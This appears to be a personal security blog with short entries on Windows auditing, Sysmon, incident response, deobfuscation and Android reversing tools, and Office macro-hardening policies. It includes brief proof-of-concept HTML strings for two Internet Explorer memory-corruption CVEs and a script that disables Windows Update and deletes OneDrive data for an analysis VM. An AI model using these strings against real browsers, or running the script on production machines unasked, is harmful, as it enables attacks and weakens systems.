DRIF wyliczenie hash rekursywnie w windows

13 August 2018



current folder: dir | Get-FileHash

current folder and subfolders: dir -recurse | Get-FileHash

exclude *.log files: dir -recurse -exclude *.log | Get-FileHash

Note, default hashing algorithm is SHA256. You can use any of: MD5, SHA1, SHA256 (default), SHA384, SHA512, MACTripleDES, RIPEMD160:

dir -recurse -exclude *.log | Get-FileHash -Algorithm SHA512

more details: Get-Help Get-FileHash

current folder and subfolders: long line wrap:  dir -recurse | Get-FileHash | Format-Table -Wrap

Audit Windows Infrastructre

10 June 2018

WINSpect script provides audit checks and enumeration

  • Checking for installed security products.
  • Checking for DLL hijackability (Authenticated Users security context).
  • Checking for User Account Control settings.
  • Checking for unattended installs leftovers.
  • Enumerating world-exposed local filesystem shares.
  • Enumerating domain users and groups with local group membership.
  • Enumerating registry autoruns.
  • Enumerating local services that are configurable by Authenticated Users group members.
  • Enumerating local services for which corresponding binary is writable by Authenticated Users group members.
  • Enumerating non-system32 Windows Hosted Services and their associated DLLs.
  • Enumerating local services with unquoted path vulnerability.
  • Enumerating non-system scheduled tasks

https://github.com/A-mIn3/WINspect

https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/

Silent windows 10 for Malware Analysis

9 May 2018

sc stop DiagTrack

sc stop diagnosticshub.standardcollector.service

sc stop dmwappushservice

sc stop WMPNetworkSvc

sc stop WSearch

sc stop wuauserv

 

sc config DiagTrack start= disabled

sc config diagnosticshub.standardcollector.service start= disabled

sc config dmwappushservice start= disabled

sc config WMPNetworkSvc start= disabled

sc config WSearch start= disabled

sc config wuauserv start= disabled

 

 

schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable

schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable

schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable

schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /Disable

schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /Disable

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn" /Disable

schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack" /Disable

schtasks /Change /TN "Microsoft\Office\Office 15 Subscription Heartbeat" /Disable

 

schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable

schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable

schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable

schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /Disable

 

@rem *** Telemetry i Data Collection ***

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v PreventDeviceMetadataFromNetwork /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "AITEnable" /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger" /v "Start" /t REG_DWORD /d 0 /f

 

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v Enabled /t REG_DWORD /d 0 /f

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f

reg add "HKCU\Control Panel\International\User Profile" /v HttpAcceptLanguageOptOut /t REG_DWORD /d 1 /f

 

reg add "HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v UxOption /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v DODownloadMode /t REG_DWORD /d 0 /f

 

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU " /v NoAutoUpdate /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"     /f /v AUOptions /t reg_dword /d 2

 

REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f

 

REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t  REG_DWORD /d 0 /f

reg add HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU     /f /v ScheduledInstallDay /t reg_dword /d 0

 

 

REM *** usunięcie OneDrive ***

start /wait "" "%SYSTEMROOT%\SYSWOW64\ONEDRIVESETUP.EXE" /UNINSTALL

rd C:\OneDriveTemp /Q /S >NUL 2>&1

rd "%USERPROFILE%\OneDrive" /Q /S >NUL 2>&1

rd "%LOCALAPPDATA%\Microsoft\OneDrive" /Q /S >NUL 2>&1

rd "%PROGRAMDATA%\Microsoft OneDrive" /Q /S >NUL 2>&1

reg add "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1

reg add "HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1

start /wait TASKKILL /F /IM explorer.exe

start explorer.exe

 

 

Blocklists of Suspected Malicious IPs and URLs

18 March 2018

source: https://zeltser.com/malicious-ip-blocklists/

 

Sysmon - DFIR

source https://github.com/MHaggis/sysmon-dfir | 10 February 2018

Sysmon - DFIR

A curated list of resources for learning about deploying, managing and hunting with Microsoft Sysmon. Contains presentations, deployment methods, configuration file examples, blogs and additional github repositories.

Sysmon Learning Resources

General

Sysmon Configuration

@SwiftOnSecurity config

Recommended.

Config will assist with bringing you up to speed in relation to critical process monitoring, network utilization, and so on. Note that the concept is to not log everything, but the most important items.

https://github.com/SwiftOnSecurity/sysmon-config

Sysmon_config.xml

Solid, detailed config. Probably one of the best ones out there in relation to completeness.

MalwareArchaeology

Sysmon-a.cfg

Basic config that will monitor critical Windows process execution. Very basic, but a good config to get used to sysmon and how things operate.

Blog post by blacklanternsecurity

Sysmon-b.cfg

Crypsis Group published config and PDF. Fairly detailed list of excludes that should assist with understanding how they work and get a configuration started.

Crypsis Group Config

Crypsis Group PDF

Sysmon-c.cfg

Great configuration to understand excludes and contains.

Decent Security Config

Sysmon-d.cfg

Solid blog post related to getting started with Sysmon. Config is nicely laid out and easy to understand.

909Research Blog

Sysmon-e.cfg

Config is specific but it provides a good foundation for capturing a lot of specific data.

https://github.com/Prevenity/sysmon

(Translated comments to english)

StartLogging.xml

Provided by https://github.com/VVard0g - Roberto Rodriguez

https://gist.github.com/VVard0g/136481552d8845e52962534d1a4b8664

Sysmoncfg_v2|31.xml

Related material from Splunking the Endpoint .conf talk by James Brodsky and Dimitri McKay.

Splunking the Endpoint - Files from presentation

Configs are optimized for Splunk.

Additional configs

Configs are updated frequently --

SwiftOnSecurity Fork by Ion-Storm

Server Config: https://gist.github.com/Neo23x0/a4b4af9481e01e749409

Client config: https://gist.github.com/Neo23x0/f56bea38d95040b70cf5

Incydent Response Playbook

10 December 2017

Incident source

  • Any attacks affecting critical assets
  • Denial-of-Service attacks that isolate or impede critical service or network performance
  • Malicious logic (virus) attacks that isolate enclaves
  • Administrator/root-level access obtained by unauthorized personnel

 

  • Significant trends suspected in incidents or events
  • Indication of multiple suspected systems
  • Suspected e-mail spoofing
  • Unauthorized probes or scans of the network

 

  • Unusual system performance or behavior
  • Unplanned system crashes, outages, or configurationchanges
  • Suspicious files identified on a server Missing data, files, or programs
  • Unexplained access privilege changes Poor security practices
  • Unusual after-hours system activity Simultaneous logins by the same user from differentIP addresses
  • Unauthorized activity by privileged users

 

  • System compromise internal
  • System compromise cloud
  • Theft of confidential information
  • Theft or loss of mobile device/media
  • Malware
  • Phishing

 

Incydent Responder playbook with flow

  • https://www.incidentresponse.com/playbooks/malware-outbreak
  • https://www.incidentresponse.com/playbooks/phishing
  • https://www.incidentresponse.com/playbooks/data-theft
  • https://www.incidentresponse.com/playbooks/virus-outbreak
  • https://www.incidentresponse.com/playbooks/ddos
  • https://www.incidentresponse.com/playbooks/unauthorized-access
  • https://www.incidentresponse.com/playbooks/elevation-of-privilege
  • https://www.incidentresponse.com/playbooks/root-access
  • https://www.incidentresponse.com/playbooks/improper-computer-usage

Handbook

  • http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
  • https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
  • https://resources.sei.cmu.edu/asset_files/Handbook/2003_002_001_14102.pdf
  • https://www.nasa.gov/pdf/589502main_ITS-HBK-2810.09-02%20%5BNASA%20Information%20Security%20Incident%20Management%5D.pdf
  • https://www.cybersecuritycoalition.be/content/uploads/cybersecurity-incident-management-guide-EN.pdf

Other resources

  • https://www.crest-approved.org/wp-content/uploads/2014/11/CSIR-Procurement-Guide.pdf
  • https://www.it-cube.net/wp-content/uploads/2017/09/Exabeam_Incident_Response_for_Top_3_Security_Scenarios.pdf
  •  

.Net Obfuscation

10 August 2016

http://www.ssware.com/cryptoobfuscator/obfuscator-net.htm

not ethical: ! https://www.youtube.com/watch?v=Gq6hLf3uq3k

sample of security by obscurity!

Deobfuscation Tools

8 August 2016

A curated list of awesome deobfuscation tools for reverse engineers.

 

1. Balbuzard

Balbuzard is a package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). It can also crack malware obfuscation such as XOR, ROL, etc by bruteforcing and checking for those patterns.

2. de4dot

de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored (eg. string encryption), but symbol renaming is impossible to restore since the original names aren’t (usually) part of the obfuscated assembly. It uses dnlib to read and write assemblies so make sure you get it or it won’t compile.

3. FLOSS

FireEye Labs Obfuscated String Solver (FLOSS) uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.

4. iheartxor

iheartxor can be used to bruteforce xor encoded strings within a user defined regular expression pattern (-r). The default search pattern is a regular expression of that searches for data between null bytes (‘\x00’). The tool can also be used to do a straight xor on a file with -f file.name -k value. The value must between 0x0-0x255.

5. NoMoreXOR

NoMoreXOR helps guess a files 256 byte XOR key by using frequency analysis.

6. PackerAttacker

The Packer Attacker is a generic hidden code extractor for Windows malware. It supports the following types of pacers: running from heap, replacing PE header, injecting in a process.

7. unpacker

unpacker is a automated malware unpacker for Windows malware based on WinAppDbg.

8. unxor

unxor will search through an XOR-encoded file (binary, text-file, whatever) and use known-plaintext attacks to deduce the original keystream. Works on keys half as long as the known-plaintext, in linear complexity.

9. VirtualDeobfuscator

VirtualDeobfuscator is a reverse engineering tool for virtualization wrappers. The goal of the Virtual Deobfuscator is to analyze a runtrace and filter out the VM processing instructions, leaving a reverse engineer with a bytecode version of the original binary.

10. XORBruteForcer

XORBruteForcer is a python script that implements a XOR bruteforcing of a given file, although a specific key can be used too. It’s possible to look for a word in the xored result, minimizing the output.

11. XORSearch

XORSearch is a program to search for a given string in an XOR, ROL, ROT or SHIFT encoded binary file. XORSearch will try all XOR keys (0 to 255), ROL keys (1 to 7), ROT keys (1 to 25) and SHIFT keys (1 to 7) when searching.

12. XORStrings

XORStrings will search for strings in the (binary) file you provide it, using the same encodings as XORSearch (XOR, ROL, ROT and SHIFT). For every encoding/key, XORStrings will search for strings and report the number of strings found, the average string length and the maximum string length.

13. xortool

xortool is a python script that will attempt to guess the XOR key length (based on count of equal chars), as well as the key itself (based on knowledge of most frequent char).

 

source: https://hackerlists.com/deobfuscation-tools/

Android Reverse Engineering Tools

8 August 2016

A curated list of awesome Android reverse engineering tools.

Be sure to check out our list of IDA Pro alternatives and best deobfuscation tools, too.

1. Smali/Baksmali

smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)

2. AndBug

AndBug is a debugger targeting the Android platform’s Dalvik virtual machine intended for reverse engineers and developers. It uses the same interfaces as Android’s Eclipse debugging plugin, the Java Debug Wire Protocol (JDWP) and Dalvik Debug Monitor (DDM) to permit users to hook Dalvik methods, examine process state, and even perform changes.

Unlike Google’s own Android Software Development Kit debugging tools, AndBug does not require or expect source code. It does, however, require that you have some level of comfort with Python, as it uses a concept of scripted breakpoints, called “hooks”, for most nontrivial tasks.

3. Androguard

Androguard is a full python tool to play with Android files.

  • DEX, ODEX
  • APK
  • Android’s binary xml
  • Android resources
  • Disassemble DEX/ODEX bytecodes
  • Decompiler for DEX/ODEX files

4. Apktool

A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with an app easier because of project-like file structure and automation of some repetitive tasks like building apk, etc.

Features:

  • Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

5. Android Framework for Exploitation

Android Framework for Exploitation is a framework for exploiting android based devices and applications.

6. Bypass signature and permission checks for IPCs

This tool leverages Cydia Substrate to bypass signature and permission checks for IPCs.

7. Android OpenDebug

This tool leverages Cydia Substrate to make all applications running on the device debuggable; once installed any application will let a debugger attach to them.

8. Dare

Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techniques developed for traditional Java applications.

9. Dex2Jar

Tools to work with android .dex and java .class files.

10. Enjarify

Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.

11. Dedexer

Dedexer is a disassembler tool for DEX files. DEX is a format introduced by the creators of the Android platform. The format and the associated opcode set is in distant relationship with the Java class file format and Java bytecodes. Dedexer is able to read the DEX format and turn into an “assembly-like format”. This format was largely influenced by the Jasmin syntax but contains Dalvik opcodes. For this reason, Jasmin is not able to compile the generated files.

12. Fino

An Android Dynamic Analysis Tool.

13. Indroid

The aim of the project is to demonstrate that a simple debugging functionality on *nix systems a.k.a ptrace() can be abused by malware to inject malicious code in remote processes. Indroid provides CreateRemoteThread() equivalent for ARM based *nix devices.

If you want to get a more deeper insight into the working of the framework you may:

14. IntentSniffer

Intent Sniffer is a tool that can be used on any device using the Google Android operating system (OS). On the Android OS, an Intent is description of an action to be performed, such as startService to start a service. The Intent Sniffer tool performs monitoring of runtime routed broadcasts Intents. It does not see explicit broadcast Intents, but defaults to (mostly) unprivileged broadcasts. There is an option to see recent tasks Intents (GET_TASKS), as Activity’s intents are visible when started. The tool can also dynamically update Actions & Categories.

15. Introspy

Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues.

16. JAD

Jad is a Java decompiler.

17. JD-GUI

JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields.

18. CFR

CFR will decompile modern Java features – Java 8 lambdas (pre and post Java beta 103 changes), Java 7 String switches etc, but is written entirely in Java 6.

19. Krakatau

Krakatau currently contains three tools – a decompiler and disassembler for Java classfiles and an assembler to create classfiles.

20. Procyon

While still incomplete, tests seem to indicate that the Procyon decompiler can generally hold its own against the other leading Java decompilers out there.

21. FernFlower

Fernflower is the first actually working analytical decompiler for Java.

22. Redexer

Redexer is a reengineering tool that manipulates Android app binaries. This tool is able to parse a DEX file into an in-memory data structure; to infer with which parameters the app uses certain permissions (we name this feature RefineDroid); to modify and unparse that data structure to produce an output DEX file (we name these features Dr. Android, which stands for Dalvik Rewriting for Android).

23. Simplify Android deobfuscator

Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn’t matter what the specific type of obfuscation is used.

24. Bytecode viewer

Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more.

It’s written completely in Java, and it’s open sourced. It’s currently being maintained and developed by Konloch.

There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of.

You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM.

25. Radare2

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.

Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for reversing apks, analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, etc…

 

source: https://hackerlists.com/android-reverse-engineering-tools/

decompile / bug bounty of manufacturer firmware

13 March 2016

virtualbox DKMS problem after reinstallation

9 March 2016

sudo apt-get install dkms --reinstall

sudo apt-get --reinstall install virtualbox-dkms

sudo systemctl start vboxweb.service

---------------------- vboxweb.service ----------

 [Unit]
 Description=VirtualBox Web Service
 After=network.target

 [Service]
 Type=forking
 PIDFile=/run/vboxweb/vboxweb.pid
 ExecStart=/usr/bin/vboxwebsrv --pidfile /run/vboxweb/vboxweb.pid  --background
 User=vbox
 Group=vboxusers

 [Install]
 WantedBy=multi-user.target

--------------------

sudo mkdir /var/lib/vbox

sudo chown vbox:vboxusers /var/lib/vbox

 

 

 

Windows GPO local and doman for office 2013

8 March 2016

Admnistratve templates: 

32-bytes (11,2 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_32bit.exe
64-bytes (11,4 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_64bit.exe

extract and find admx files

local station:

  • .admx  move to C:\Windows\PolicyDefinitions
  • .adml move to C:\Windows\PolicyDefinitions\en-US

domain controler

  • .admx  move to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions
  • .adml move to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions\en-US

Run gpedit.msc

MOST important setting

GPO
value
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
Trust Access to Visual Basic Project
Disabled
VBA Macro Notification Settings
Enabled
 
Disable all without notification
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
Automation Security
Enabled
 
Set the Automation Security Level: Use application macro security level
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
Allow mix of policy and user locations
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Outlook 2013\Security\Trust Center
Apply macro security settings to macros, add-ins and additional actions
Enabled
 
Security setting for macros
Enabled
 
Security Level: Never warn, disable all
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
Trust Access to Visual Basic Project
Disabled
VBA Macro Notification Settings
Enabled
 
Disable all without notification
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
Trust Access to Visual Basic Project
Disabled
VBA Macro Notification Settings
Enabled
 
Disable all without notification
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled

 

Medium important setting

GPO
value
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
Turn off trusted documents
Enabled
Turn off Trusted Documents on the network
Enabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
Turn off trusted documents
Enabled
Turn off Trusted Documents on the network
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
Turn off trusted documents
Enabled
Turn off Trusted Documents on the network
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
Disable all application add-ins
Enabled
Disable Trust Bar Notification for unsigned application add-ins and block them
Not configured
Require that application add-ins are signed by Trusted Publisher
Not configured
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
Allow mix of policy and user locations
Disabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
Disable all application add-ins
Enabled
Disable Trust Bar Notification for unsigned application add-ins and block them
Not configured
Require that application add-ins are signed by Trusted Publisher
Not configured
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\ PowerPoint Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
Disable all application add-ins
Enabled
Disable Trust Bar Notification for unsigned application add-ins and block them
Not configured
Require that application add-ins are signed by Trusted Publisher
Not configured
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\ Word Options\Security\Trust Center\Trusted Locations
Allow Trusted Locations on the network
Disabled
Disable all trusted locations
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
Disable All ActiveX
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
Turn off file validation
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
Turn off error reporting for files that fail file validation
Enabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
Turn off file validation
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
Turn off file validation
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Protected View
Do not open files from the Internet Zone in Protected View
Disabled
Do not open files in unsafe locations in Protected View
Disabled
Set document behaviour if file validation fails
Enabled
 
Block files completely
Turn off Protected View for attachments opened from Outlook
Disabled
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Protected View
Do not open files from the Internet Zone in Protected View
Disabled
Do not open files in unsafe locations in Protected View
Disabled
Set document behaviour if file validation fails
Enabled
 
Block files completely
Turn off Protected View for attachments opened from Outlook
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Protected View
Do not open files from the Internet Zone in Protected View
Disabled
Do not open files in unsafe locations in Protected View
Disabled
Set document behaviour if file validation fails
Enabled
 
Block files completely
Turn off Protected View for attachments opened from Outlook
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security
Force file extension to match file type
Enabled
 
Always match file type
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
Force file extension to match file type
Enabled
 
Always match file type
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
Force file extension to match file type
Enabled
 
Always match file type
User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\File Block Settings
dBase III / IV files
Enabled
 
File block setting: Block
Dif and Sylk files
Enabled
 
File block setting: Block
Excel 2 macrosheets and add-in files
Enabled
 
File block setting: Block
Excel 2 worksheets
Enabled
 
File block setting: Block
Excel 2007 and later add-in files
Enabled
 
File block setting: Block
Excel 2007 and later binary workbooks
Enabled
 
File block setting: Block
Excel 2007 and later macro-enabled workbooks and templates
Enabled
 
File block setting: Block
Excel 3 macrosheets and add-in files
Enabled
 
File block setting: Block
Excel 3 worksheets
Enabled
 
File block setting: Block
Excel 4 macrosheets and add-in files
Enabled
 
File block setting: Block
Excel 4 workbooks
Enabled
 
File block setting: Block
Excel 4 worksheets
Enabled
 
File block setting: Block
Excel 95 workbooks
Enabled
 
File block setting: Block
Excel 95-97 workbooks and templates
Enabled
 
File block setting: Block
Excel 97-2003 add-in files
Enabled
 
File block setting: Block
Excel 97-2003 workbooks and templates
Enabled
 
File block setting: Block
Set default file block behavior
Enabled
 
Blocked files are not opened
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\File Block Settings
PowerPoint 97-2003 presentations, shows, templates and add-in files
Enabled
 
File block setting: Block
PowerPoint beta files
Enabled
 
File block setting: Block
Set default file block behavior
Enabled
 
Blocked files are not opened
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\File Block Settings
Set default file block behavior
Enabled
 
Blocked files are not opened
Word 2 and earlier binary documents and templates
Enabled
 
File block setting: Block
Word 2000 binary documents and templates
Enabled
 
File block setting: Block
Word 2003 binary documents and templates
Enabled
 
File block setting: Block
Word 2007 binary and later binary documents and templates
Enabled
 
File block setting: Block
Word 6.0 binary documents and templates
Enabled
 
File block setting: Block
Word 95 binary documents and templates
Enabled
 
File block setting: Block
Word 97 binary documents and templates
Enabled
 
File block setting: Block
Word XP binary documents and templates
Enabled
 
File block setting: Block
User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security
Make hidden markup visible
Enabled
User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security
Make hidden markup visible
Enabled

 

LESS important setting

 

GPO
value
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Privacy\Trust Center
Allow including screenshot with Office Feedback
Disabled
Automatically receive small updates to improve reliability
Disabled
Disable Opt-in Wizard on first run
Enabled
Enable Customer Experience Improvement Program
Disabled
Send Office Feedback
Disabled
User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center\Trusted Catalogs
Allow Unsecure Apps and Catalogs
Disabled

GIAC - GREM

6 March 2016

Internet Explorer Exploit

12 February 2016

CVE-2016-0061:

 

<meta http-equiv=X-UA-Compatible content=IE=7><form id="&;&;"><body onload=opener?opener["\u4141\u4141"]():open("?")>

Vulnerability Severity Ratings and Impact

CVE number

Vulnerability title

Internet Explorer 9

Internet Explorer 10

Internet Explorer 11

Internet Explorer 11
on Windows 10

CVE-2016-0061

Microsoft Browser Memory Corruption Vulnerability

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

 

CVE-2016-0062

https://technet.microsoft.com/en-us/library/security/ms16-009.aspx

<body onload=open("2.html")>

Vulnerability Severity Ratings and Impact

Vulnerability title

Internet Explorer 9

Internet Explorer 10

Internet Explorer 11

Internet Explorer 11
on Windows 10

CVE-2016-0062

Microsoft Browser Memory Corruption Vulnerability

Not applicable

Not applicable

Windows Clients
Critical / RCE

Windows Servers:
Moderate / RCE

 

CTF writeups from P4 Team

19 October 2015

https://github.com/p4-team/ctf/blob/master/2015-10-18-hitcon/

https://github.com/p4-team/ctf

 

mandiant free forensic tools

24 June 2015
Source: https://www.mandiant.com/resources/downloads
  • Redline ®

    Redline® is a free utility that accelerates the process of triaging hosts suspected of being compromised or infected while supporting in-depth live memory analysis.More

  • IOC Editor

    Mandiant's IOC Editor is a free editor for Indicators of Compromise (IOCs).More

  • IOC Finder

    Mandiant's IOC Finder is a free tool for collecting host system data and reporting the presence of Indicators of Compromise (IOCs).More

  • Memoryze™

    Free memory forensics software designed to help incident responders find evil within live memory. More

  • Memoryze™ for the Mac

    Free memory forensics software designed to help incident responders find evil within live memory. More

  • Highlighter™

    Highlighter is designed to help security analysts and system administrators rapidly review log and other structured text files. More

  • Web Historian™

    Web Historian’s capabilities have been consolidated into Mandiant Redline.More

